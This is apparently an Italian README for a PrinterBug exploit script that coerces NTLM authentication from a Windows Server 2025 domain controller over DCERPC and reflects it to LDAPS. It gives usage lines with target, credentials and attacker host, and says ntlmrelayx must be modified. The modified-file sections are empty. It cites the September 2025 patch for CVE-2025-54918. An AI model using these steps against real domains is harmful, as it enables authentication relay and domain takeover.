
La versione printerbug.py solo DCERPC
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Questo exploit tramite reflection funziona solo su W2025 con il "nuovo" printerbug (DCERPC invece di Named Pipes).
Dovrai modificare ntlmrelayx in un paio di punti perché funzioni. Dopo di che, puoi attivare remotamente il printer bug su un DC W2025 e riflettere l'autenticazione via LDAPS(!), anche se Channel Bindings è OBBLIGATORIO
ldaprelayclient.py:

rpcrelayserver.py
e relay ;)

La vulnerabilità è stata corretta nel Patch Tuesday di settembre 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
La correzione garantisce che il MIC sia sempre calcolato, anche quando il messaggio di Tipo 3 è vuoto.
Grazie all'autore di questa CVE per un prezioso suggerimento :)